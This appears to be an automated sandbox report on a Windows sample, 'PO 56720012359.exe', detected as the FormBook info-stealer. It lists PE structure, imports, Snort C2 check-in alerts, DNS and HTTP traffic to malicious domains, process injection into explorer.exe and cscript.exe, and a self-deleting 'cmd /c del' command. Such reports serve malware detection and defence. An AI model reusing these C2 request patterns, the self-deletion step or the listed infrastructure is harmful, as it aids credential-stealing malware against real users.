                          cmp ecx, eax
                          jc 00007FDFFCC67381h
                          lea eax, dword ptr [edx+00000090h]
                          cmp ecx, eax
                          jnc 00007FDFFCC67396h
                          cmp dword ptr [ecx], edi
                          je 00007FDFFCC67394h
                          xor ecx, ecx
                          test ecx, ecx
                          je 00007FDFFCC674A6h
                          mov edx, dword ptr [ecx+08h]
                          test edx, edx
                          je 00007FDFFCC6749Bh
                          cmp edx, 05h
                          jne 00007FDFFCC6739Eh
                          and dword ptr [ecx+08h], 00000000h
                          xor eax, eax
                          inc eax
                          jmp 00007FDFFCC6748Bh
                          cmp edx, 01h
                          jne 00007FDFFCC6739Ah
                          or eax, FFFFFFFFh
                          jmp 00007FDFFCC6747Eh

                          Rich Headers

                          Programming Language:
                          • [ C ] VS2015 UPD3.1 build 24215
                          • [C++] VS2013 build 21005
                          • [LNK] VS2015 UPD3.1 build 24215
                          • [ASM] VS2013 build 21005
                          • [ C ] VS2013 build 21005
                          • [RES] VS2015 UPD3 build 24213

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x113bc0xc8.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x37668.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e0000xd70.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x10e300x1c.rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10e500x40.rdata
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0xd0000x1c0.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000xb6b60xb800False0.581288213315data6.64409141426IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .rdata0xd0000x4dd40x4e00False0.389272836538data4.66913496112IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x120000x31c40x1400False0.319921875data3.49628246477IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .rsrc0x160000x376680x37800False0.951919693131data7.9875649034IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x4e0000xd700xe00False0.796875data6.45071133859IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountry
                          OZX0x160f00x364b8dataEnglishUnited States
                          RT_ICON0x4c5a80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294440951, next used block 4294440951EnglishUnited States
                          RT_GROUP_ICON0x4d6500x14dataEnglishUnited States

                          Imports

                          DLLImport
                          KERNEL32.dllFreeLibrary, GetProcAddress, LoadLibraryExW, lstrcmpiW, lstrcpyW, lstrcatW, lstrlenW, CloseHandle, WriteConsoleW, SetFilePointerEx, SetStdHandle, GetConsoleMode, GetConsoleCP, FlushFileBuffers, LCMapStringW, VirtualProtect, GetStringTypeW, HeapReAlloc, OutputDebugStringW, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, LeaveCriticalSection, EnterCriticalSection, GetModuleHandleW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, TerminateProcess, GetCurrentProcess, GetProcessHeap, HeapFree, HeapAlloc, GetLastError, HeapSize, ExpandEnvironmentStringsW, GetCommandLineW, SetLastError, GetCurrentThreadId, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameW, WriteFile, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, CreateFileW
                          MSWSOCK.dllgetnetbyname, SetServiceA, GetAddressByNameA, EnumProtocolsA, rcmd, AcceptEx
                          rtutils.dllTraceGetConsoleW, TraceVprintfExW, RouterLogEventStringA, RouterLogEventW, TraceDeregisterW, LogEventA
                          MAPI32.dll
                          WININET.dllGopherFindFirstFileW, InternetQueryOptionA, InternetHangUp, FindFirstUrlCacheContainerW
                          RPCRT4.dllNDRSContextMarshall, NdrSimpleStructFree, RpcServerInqBindings, NdrConvert2, NdrNonEncapsulatedUnionBufferSize, NdrConformantArrayUnmarshall
                          SHELL32.dllExtractAssociatedIconExA, SHBrowseForFolder
                          USER32.dllMessageBoxW, GetDC, GrayStringA
                          ADVAPI32.dllRegQueryValueExW, RegQueryValueExA, RegOpenKeyExW, RegCloseKey, StartServiceCtrlDispatcherW

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          09/15/21-08:36:35.041327ICMP449ICMP Time-To-Live Exceeded in Transit10.254.0.2192.168.2.5
                          09/15/21-08:37:06.463980TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978280192.168.2.5107.180.44.148
                          09/15/21-08:37:06.463980TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978280192.168.2.5107.180.44.148
                          09/15/21-08:37:06.463980TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978280192.168.2.5107.180.44.148
                          09/15/21-08:37:11.792471TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978380192.168.2.550.87.144.47
                          09/15/21-08:37:11.792471TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978380192.168.2.550.87.144.47
                          09/15/21-08:37:11.792471TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978380192.168.2.550.87.144.47

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 15, 2021 08:36:23.231709003 CEST4977480192.168.2.5156.252.96.170
                          Sep 15, 2021 08:36:23.517390966 CEST8049774156.252.96.170192.168.2.5
                          Sep 15, 2021 08:36:23.517803907 CEST4977480192.168.2.5156.252.96.170
                          Sep 15, 2021 08:36:23.518058062 CEST4977480192.168.2.5156.252.96.170
                          Sep 15, 2021 08:36:23.804039001 CEST8049774156.252.96.170192.168.2.5
                          Sep 15, 2021 08:36:24.016992092 CEST8049774156.252.96.170192.168.2.5
                          Sep 15, 2021 08:36:24.017019987 CEST8049774156.252.96.170192.168.2.5
                          Sep 15, 2021 08:36:24.017297029 CEST4977480192.168.2.5156.252.96.170
                          Sep 15, 2021 08:36:24.017507076 CEST4977480192.168.2.5156.252.96.170
                          Sep 15, 2021 08:36:24.303092957 CEST8049774156.252.96.170192.168.2.5
                          Sep 15, 2021 08:36:29.227380991 CEST4977580192.168.2.5154.81.100.18
                          Sep 15, 2021 08:36:29.440563917 CEST8049775154.81.100.18192.168.2.5
                          Sep 15, 2021 08:36:29.440790892 CEST4977580192.168.2.5154.81.100.18
                          Sep 15, 2021 08:36:29.441050053 CEST4977580192.168.2.5154.81.100.18
                          Sep 15, 2021 08:36:29.654616117 CEST8049775154.81.100.18192.168.2.5
                          Sep 15, 2021 08:36:29.654658079 CEST8049775154.81.100.18192.168.2.5
                          Sep 15, 2021 08:36:29.654845953 CEST8049775154.81.100.18192.168.2.5
                          Sep 15, 2021 08:36:29.664530993 CEST4977580192.168.2.5154.81.100.18
                          Sep 15, 2021 08:36:29.664748907 CEST4977580192.168.2.5154.81.100.18
                          Sep 15, 2021 08:36:29.882493973 CEST8049775154.81.100.18192.168.2.5
                          Sep 15, 2021 08:36:34.869563103 CEST4977680192.168.2.523.252.68.226
                          Sep 15, 2021 08:36:37.880909920 CEST4977680192.168.2.523.252.68.226
                          Sep 15, 2021 08:36:43.881170034 CEST4977680192.168.2.523.252.68.226
                          Sep 15, 2021 08:36:58.227279902 CEST4978180192.168.2.523.252.68.226
                          Sep 15, 2021 08:37:01.226968050 CEST4978180192.168.2.523.252.68.226
                          Sep 15, 2021 08:37:06.348965883 CEST4978280192.168.2.5107.180.44.148
                          Sep 15, 2021 08:37:06.460891008 CEST8049782107.180.44.148192.168.2.5
                          Sep 15, 2021 08:37:06.463809013 CEST4978280192.168.2.5107.180.44.148
                          Sep 15, 2021 08:37:06.463979959 CEST4978280192.168.2.5107.180.44.148
                          Sep 15, 2021 08:37:06.574717999 CEST8049782107.180.44.148192.168.2.5
                          Sep 15, 2021 08:37:06.587517977 CEST8049782107.180.44.148192.168.2.5
                          Sep 15, 2021 08:37:06.587538004 CEST8049782107.180.44.148192.168.2.5
                          Sep 15, 2021 08:37:06.587790012 CEST4978280192.168.2.5107.180.44.148
                          Sep 15, 2021 08:37:06.587814093 CEST4978280192.168.2.5107.180.44.148
                          Sep 15, 2021 08:37:06.701248884 CEST8049782107.180.44.148192.168.2.5
                          Sep 15, 2021 08:37:07.227076054 CEST4978180192.168.2.523.252.68.226

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 15, 2021 08:34:58.858092070 CEST6180553192.168.2.58.8.8.8
                          Sep 15, 2021 08:34:58.884917974 CEST53618058.8.8.8192.168.2.5
                          Sep 15, 2021 08:35:19.576796055 CEST5479553192.168.2.58.8.8.8
                          Sep 15, 2021 08:35:19.610516071 CEST53547958.8.8.8192.168.2.5
                          Sep 15, 2021 08:35:32.359035015 CEST4955753192.168.2.58.8.8.8
                          Sep 15, 2021 08:35:32.398933887 CEST53495578.8.8.8192.168.2.5
                          Sep 15, 2021 08:35:50.121221066 CEST6173353192.168.2.58.8.8.8
                          Sep 15, 2021 08:35:50.162609100 CEST53617338.8.8.8192.168.2.5
                          Sep 15, 2021 08:36:09.398763895 CEST6544753192.168.2.58.8.8.8
                          Sep 15, 2021 08:36:09.434449911 CEST53654478.8.8.8192.168.2.5
                          Sep 15, 2021 08:36:15.205795050 CEST5244153192.168.2.58.8.8.8
                          Sep 15, 2021 08:36:15.235292912 CEST53524418.8.8.8192.168.2.5
                          Sep 15, 2021 08:36:23.043905020 CEST6217653192.168.2.58.8.8.8
                          Sep 15, 2021 08:36:23.223212957 CEST53621768.8.8.8192.168.2.5
                          Sep 15, 2021 08:36:29.029289961 CEST5959653192.168.2.58.8.8.8
                          Sep 15, 2021 08:36:29.223927021 CEST53595968.8.8.8192.168.2.5
                          Sep 15, 2021 08:36:34.686691046 CEST6529653192.168.2.58.8.8.8
                          Sep 15, 2021 08:36:34.867702961 CEST53652968.8.8.8192.168.2.5
                          Sep 15, 2021 08:36:48.508781910 CEST6318353192.168.2.58.8.8.8
                          Sep 15, 2021 08:36:48.547694921 CEST53631838.8.8.8192.168.2.5
                          Sep 15, 2021 08:36:50.007797956 CEST6015153192.168.2.58.8.8.8
                          Sep 15, 2021 08:36:50.042438030 CEST53601518.8.8.8192.168.2.5
                          Sep 15, 2021 08:36:57.868899107 CEST5696953192.168.2.58.8.8.8
                          Sep 15, 2021 08:36:58.204263926 CEST53569698.8.8.8192.168.2.5
                          Sep 15, 2021 08:37:00.935902119 CEST5516153192.168.2.58.8.8.8
                          Sep 15, 2021 08:37:00.974194050 CEST53551618.8.8.8192.168.2.5
                          Sep 15, 2021 08:37:06.317146063 CEST5475753192.168.2.58.8.8.8
                          Sep 15, 2021 08:37:06.347759962 CEST53547578.8.8.8192.168.2.5
                          Sep 15, 2021 08:37:11.603655100 CEST4999253192.168.2.58.8.8.8
                          Sep 15, 2021 08:37:11.633694887 CEST53499928.8.8.8192.168.2.5
                          Sep 15, 2021 08:37:17.371459961 CEST6007553192.168.2.58.8.8.8
                          Sep 15, 2021 08:37:17.418663979 CEST53600758.8.8.8192.168.2.5

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          Sep 15, 2021 08:36:23.043905020 CEST192.168.2.58.8.8.80x273Standard query (0)www.stuntfighting.comA (IP address)IN (0x0001)
                          Sep 15, 2021 08:36:29.029289961 CEST192.168.2.58.8.8.80xc6ebStandard query (0)www.fmodesign.comA (IP address)IN (0x0001)
                          Sep 15, 2021 08:36:34.686691046 CEST192.168.2.58.8.8.80x237fStandard query (0)www.mobilewz.comA (IP address)IN (0x0001)
                          Sep 15, 2021 08:36:57.868899107 CEST192.168.2.58.8.8.80xb373Standard query (0)www.mobilewz.comA (IP address)IN (0x0001)
                          Sep 15, 2021 08:37:00.935902119 CEST192.168.2.58.8.8.80x38d1Standard query (0)www.arerasols.comA (IP address)IN (0x0001)
                          Sep 15, 2021 08:37:06.317146063 CEST192.168.2.58.8.8.80x9590Standard query (0)www.healthy-shack.comA (IP address)IN (0x0001)
                          Sep 15, 2021 08:37:11.603655100 CEST192.168.2.58.8.8.80xe92eStandard query (0)www.allfyllofficial.comA (IP address)IN (0x0001)
                          Sep 15, 2021 08:37:17.371459961 CEST192.168.2.58.8.8.80xbf36Standard query (0)www.la-bio-geo.comA (IP address)IN (0x0001)

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Sep 15, 2021 08:36:23.223212957 CEST8.8.8.8192.168.2.50x273No error (0)www.stuntfighting.com156.252.96.170A (IP address)IN (0x0001)
                          Sep 15, 2021 08:36:29.223927021 CEST8.8.8.8192.168.2.50xc6ebNo error (0)www.fmodesign.com154.81.100.18A (IP address)IN (0x0001)
                          Sep 15, 2021 08:36:34.867702961 CEST8.8.8.8192.168.2.50x237fNo error (0)www.mobilewz.com23.252.68.226A (IP address)IN (0x0001)
                          Sep 15, 2021 08:36:58.204263926 CEST8.8.8.8192.168.2.50xb373No error (0)www.mobilewz.com23.252.68.226A (IP address)IN (0x0001)
                          Sep 15, 2021 08:37:00.974194050 CEST8.8.8.8192.168.2.50x38d1Name error (3)www.arerasols.comnonenoneA (IP address)IN (0x0001)
                          Sep 15, 2021 08:37:06.347759962 CEST8.8.8.8192.168.2.50x9590No error (0)www.healthy-shack.comhealthy-shack.comCNAME (Canonical name)IN (0x0001)
                          Sep 15, 2021 08:37:06.347759962 CEST8.8.8.8192.168.2.50x9590No error (0)healthy-shack.com107.180.44.148A (IP address)IN (0x0001)
                          Sep 15, 2021 08:37:11.633694887 CEST8.8.8.8192.168.2.50xe92eNo error (0)www.allfyllofficial.com50.87.144.47A (IP address)IN (0x0001)
                          Sep 15, 2021 08:37:17.418663979 CEST8.8.8.8192.168.2.50xbf36Name error (3)www.la-bio-geo.comnonenoneA (IP address)IN (0x0001)

                          HTTP Request Dependency Graph

                          • www.stuntfighting.com
                          • www.fmodesign.com
                          • www.healthy-shack.com

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.549774156.252.96.17080C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Sep 15, 2021 08:36:23.518058062 CEST4563OUTGET /b6cu/?y2=_npT80v0M2&L8fhOFRP=0cNTwCf3GfppWKB0T1XESIgtEFKjNX2tylJLJaVzm8N2XRqnUHRn8w7/tpdMCfw1z2P+ HTTP/1.1
                          Host: www.stuntfighting.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Sep 15, 2021 08:36:24.016992092 CEST4563INHTTP/1.1 302 Moved Temporarily
                          Server: nginx/1.16.1
                          Date: Wed, 15 Sep 2021 06:36:23 GMT
                          Content-Type: text/html; charset=gbk
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Powered-By: PHP/5.6.40
                          Location: /404.html
                          Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          1192.168.2.549775154.81.100.1880C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Sep 15, 2021 08:36:29.441050053 CEST4564OUTGET /b6cu/?L8fhOFRP=v4/7wB6X+ne64BMfzkTnNfrtxR+fNWuSRi8sP9TYFcLz2AIA8KGD8NWIHbMwW3JjWqpf&y2=_npT80v0M2 HTTP/1.1
                          Host: www.fmodesign.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Sep 15, 2021 08:36:29.654658079 CEST4565INHTTP/1.1 404 Not Found
                          Server: nginx
                          Date: Wed, 15 Sep 2021 06:36:29 GMT
                          Content-Type: text/html
                          Content-Length: 146
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          2192.168.2.549782107.180.44.14880C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Sep 15, 2021 08:37:06.463979959 CEST4587OUTGET /b6cu/?y2=_npT80v0M2&L8fhOFRP=PWSncnBGX0y4t94MIYhADTl/ZWH8Ec5DThT4C2sI40tRDeDzLuqQGdQiyNRL5TLkWfMz HTTP/1.1
                          Host: www.healthy-shack.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Sep 15, 2021 08:37:06.587517977 CEST4588INHTTP/1.1 301 Moved Permanently
                          Date: Wed, 15 Sep 2021 06:37:06 GMT
                          Server: Apache
                          Location: https://healthy-shack.com/b6cu/?y2=_npT80v0M2&L8fhOFRP=PWSncnBGX0y4t94MIYhADTl/ZWH8Ec5DThT4C2sI40tRDeDzLuqQGdQiyNRL5TLkWfMz
                          Content-Length: 335
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 61 6c 74 68 79 2d 73 68 61 63 6b 2e 63 6f 6d 2f 62 36 63 75 2f 3f 79 32 3d 5f 6e 70 54 38 30 76 30 4d 32 26 61 6d 70 3b 4c 38 66 68 4f 46 52 50 3d 50 57 53 6e 63 6e 42 47 58 30 79 34 74 39 34 4d 49 59 68 41 44 54 6c 2f 5a 57 48 38 45 63 35 44 54 68 54 34 43 32 73 49 34 30 74 52 44 65 44 7a 4c 75 71 51 47 64 51 69 79 4e 52 4c 35 54 4c 6b 57 66 4d 7a 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://healthy-shack.com/b6cu/?y2=_npT80v0M2&amp;L8fhOFRP=PWSncnBGX0y4t94MIYhADTl/ZWH8Ec5DThT4C2sI40tRDeDzLuqQGdQiyNRL5TLkWfMz">here</a>.</p></body></html>


                          Code Manipulations

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          Analysis Process: PO 56720012359.exe PID: 2600 Parent PID: 6032

                          General

                          Start time:08:35:04
                          Start date:15/09/2021
                          Path:C:\Users\user\Desktop\PO 56720012359.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Users\user\Desktop\PO 56720012359.exe'
                          Imagebase:0x8b0000
                          File size:304128 bytes
                          MD5 hash:839C75A88734AAF014EF0C3D77CE9109
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:low

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 2940 Parent PID: 2600

                          General

                          Start time:08:35:08
                          Start date:15/09/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7ecfc0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: PO 56720012359.exe PID: 1392 Parent PID: 2600

                          General

                          Start time:08:35:09
                          Start date:15/09/2021
                          Path:C:\Users\user\Desktop\PO 56720012359.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Users\user\Desktop\PO 56720012359.exe'
                          Imagebase:0x8b0000
                          File size:304128 bytes
                          MD5 hash:839C75A88734AAF014EF0C3D77CE9109
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:low

                          Chronological Activities

                          Analysis Process: explorer.exe PID: 3472 Parent PID: 1392

                          General

                          Start time:08:35:13
                          Start date:15/09/2021
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff693d90000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:high

                          Chronological Activities

                          Analysis Process: cscript.exe PID: 6300 Parent PID: 3472

                          General

                          Start time:08:35:45
                          Start date:15/09/2021
                          Path:C:\Windows\SysWOW64\cscript.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\cscript.exe
                          Imagebase:0x1210000
                          File size:143360 bytes
                          MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:moderate

                          Chronological Activities

                          Analysis Process: cmd.exe PID: 6324 Parent PID: 6300

                          General

                          Start time:08:35:49
                          Start date:15/09/2021
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:/c del 'C:\Users\user\Desktop\PO 56720012359.exe'
                          Imagebase:0x150000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 6340 Parent PID: 6324

                          General

                          Start time:08:35:49
                          Start date:15/09/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7ecfc0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Disassembly

                          Code Analysis

                          Reset < >

                            Analysis Process: PO 56720012359.exe PID: 2600 Parent PID: 6032 PO 56720012359.exeCOMMON

                            Executed Functions

                            Function 008B1670, Relevance: 354.3, APIs: 6, Strings: 196, Instructions: 763stringmemorywindowCOMMON
                            Download Yara Rule
